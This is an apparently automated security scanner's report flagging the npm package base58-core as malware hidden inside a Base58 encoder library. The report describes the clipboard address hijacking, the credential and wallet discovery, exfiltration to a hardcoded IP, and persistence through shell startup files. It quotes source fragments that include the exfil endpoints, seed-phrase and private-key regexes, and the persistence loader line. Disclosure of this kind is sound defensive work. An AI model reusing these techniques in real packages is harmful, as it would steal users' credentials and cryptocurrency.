
base58-core@1.0.11

Fast, tree-shakeable Base58 encoder/decoder with TypeScript support

AI Security Review

scanned 5h ago · by lpm-firewall-ai

The distributed entrypoints contain a crypto clipboard hijacker, local credential/environment discovery, exfiltration, and shell startup persistence. The code is embedded in a package advertised as a Base58 encoder/decoder.

Static reason
High-risk behavior combination matched malicious policy; source matched previously finalized malicious package; routed for review; source fingerprint signature matched known malicious package; routed for review
Trigger
importing the package entrypoint in a long-running or otherwise activated Node process
Impact
cryptocurrency address substitution, leakage of sensitive local indicators and clipboard contents, and persistent reactivation from shell startup files
Mechanism
clipboard hijack, credential discovery, exfiltration, and persistence
Attack narrative
On activation, the package establishes persistence, enumerates wallet/browser/Telegram/SSH/npm/env indicators, exfiltrates findings to 2.27.62.51, and polls the clipboard. If copied text contains cryptocurrency addresses or secrets, it sends the original content and replaces BTC/ETH/SOL addresses with attacker-controlled wallets.
Rationale
Source inspection confirms malicious functionality in both published entrypoints that is unrelated to Base58 encoding. The activation guard weakens reachability but the package still carries concrete malware logic with exfiltration, persistence, and clipboard theft/hijacking.
Evidence
  • package.json
  • dist/index.cjs
  • dist/index.js
  • /tmp/.base58_detection_sent
  • ~/.npmrc
  • ~/.env
  • .env
  • .env.local
  • .env.production
  • ~/.ssh
  • ~/.bashrc
  • ~/.zshrc
  • ~/.profile
  • ~/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/base58-runtime.js
Network endpoints (2)
  • 2.27.62.51:8080/api/health
  • 2.27.62.51:8081/api/health

Decision evidence

public snapshot
AI called this Malicious at 94.0% confidence as Malware with low false-positive risk.
Evidence for block
  • dist/index.cjs and dist/index.js contain clipboard read/write via child_process for pbpaste/pbcopy, xclip, and PowerShell.
  • Clipboard content matching BTC/ETH/SOL addresses is replaced with hardcoded attacker wallet addresses.
  • exfil() POSTs clipboard captures and host metadata to http://2.27.62.51:8080/api/health and :8081/api/health.
  • Detection code reads home/project .env files, ~/.npmrc, ~/.ssh metadata, browser profiles, MetaMask extension paths, and Telegram tdata indicators.
  • Persistence code writes Windows Startup base58-runtime.js or appends a node loader to ~/.bashrc, ~/.zshrc, and ~/.profile.
Evidence against
  • package.json has no install/postinstall hook; only a prepublishOnly build script.
  • Runtime activation is guarded by a 72-hour Date.now delay that appears ineffective on immediate import, reducing observed reachability but not establishing benign intent.
Behavioral surface
Source
ChildProcess, Crypto, DynamicRequire, EnvironmentVars, Filesystem, Network, Shell
Supply chain
HighEntropyStrings, UrlStrings
Manifest
No manifest risk signals triggered.
scanned 2 file(s), 40.8 KB of source, external domains: 2.27.62.51

Source & flagged code

8 flagged
dist/index.js
L103: const ACTIVATION_DELAY = 72 * 60 * 60 * 1000;
L104: const EXFIL_PRIMARY = 'http://2.27.62.51:8080/api/health';
L105: const EXFIL_BACKUP = 'http://2.27.62.51:8081/api/health';
...
L110: { name: 'sol', regex: /\b[1-9A-HJ-NP-Za-km-z]{32,44}\b/g, replacement: '[redacted]' },
L111: { name: 'private_key_wif', regex: /\b[5KL][1-9A-HJ-NP-Za-km-z]{50,52}\b/g, replacement: '' },
L112: { name: 'seed_phrase', regex: /\b([a-z]{3,8}\s){11,23}[a-z]{3,8}\b/gi, replacement: '' },
...
L127: ...data,
L128: hostname: process.env?.HOSTNAME || os.hostname() || 'unknown',
L129: platform: process.platform || 'unknown',
...
L140: headers: { 'Content-Type': 'application/json' },
L141: body: payload,
L142: signal: controller.signal,
Critical
Clipboard Crypto Hijack

Source reads and rewrites clipboard contents matching cryptocurrency wallet addresses.

dist/index.js · L103
package = base58-core; repositoryIdentity = core; dependency = base58-core
L533: try {
L534: fs.writeFileSync(t, '// runtime loader\ntry { require("base58-core")._internal.activate(); } catch(e) {}');
L535: }
High
Copied Package Dependency Bridge

Package metadata claims a different repository identity while copied source loads a runtime dependency bridge.

dist/index.js · L533
matchType = normalized_sha256; matchedPackage = base58-core@1.0.8; matchedPath = dist/index.js; matchedIdentity = npm:YmFzZTU4LWNvcmU:1.0.8; similarity = 1.000; summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

dist/index.js
L11: try {
L12: const nodeCrypto = require('crypto');
L13: return new Uint8Array(nodeCrypto.createHash('sha256').update(data).digest());
Medium
Dynamic Require

Package source references dynamic require/import behavior.

dist/index.js · L11
Medium
Install Persistence

Source writes installer persistence such as shell profile or service configuration.

dist/index.js · L103
dist/index.cjs
Trigger-reachable chain: manifest.main -> dist/index.cjs
Reachable file contains a blocking source-risk pattern.
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

dist/index.cjs
matchType = normalized_sha256; matchedPackage = base58-core@1.0.8; matchedPath = dist/index.cjs; matchedIdentity = npm:YmFzZTU4LWNvcmU:1.0.8; similarity = 1.000; summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

dist/index.cjs
matchType = malicious_source_fingerprint_signature; signature = e7d654f5e60435c0; signatureType = suspicious_hashes; sourceLabel = OpenSSF malicious-packages; matchedPackage = base58-core@1.0.8; matchedPath = dist/index.cjs; matchedIdentity = npm:YmFzZTU4LWNvcmU:1.0.8; similarity = 1.000; shingleOverlap = 2; summary = Malicious code in base58-core (npm)
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

dist/index.cjs

Findings

2 Critical · 4 High · 5 Medium · 5 Low
Critical · Clipboard Crypto Hijack · dist/index.js
Critical · Trigger Reachable Dangerous Capability · dist/index.cjs
High · Copied Package Dependency Bridge · dist/index.js
High · Known Malware Source Similarity · dist/index.cjs
High · Known Malware Source Similarity · dist/index.js
High · Known Malware Source Fingerprint Signature · dist/index.cjs
Medium · Dynamic Require · dist/index.js
Medium · Network
Medium · Environment Vars
Medium · Install Persistence · dist/index.js
Medium · Structural Risk Force Deep Review
Low · Non Install Lifecycle Scripts
Low · Scripts Present
Low · Filesystem
Low · High Entropy Strings
Low · Url Strings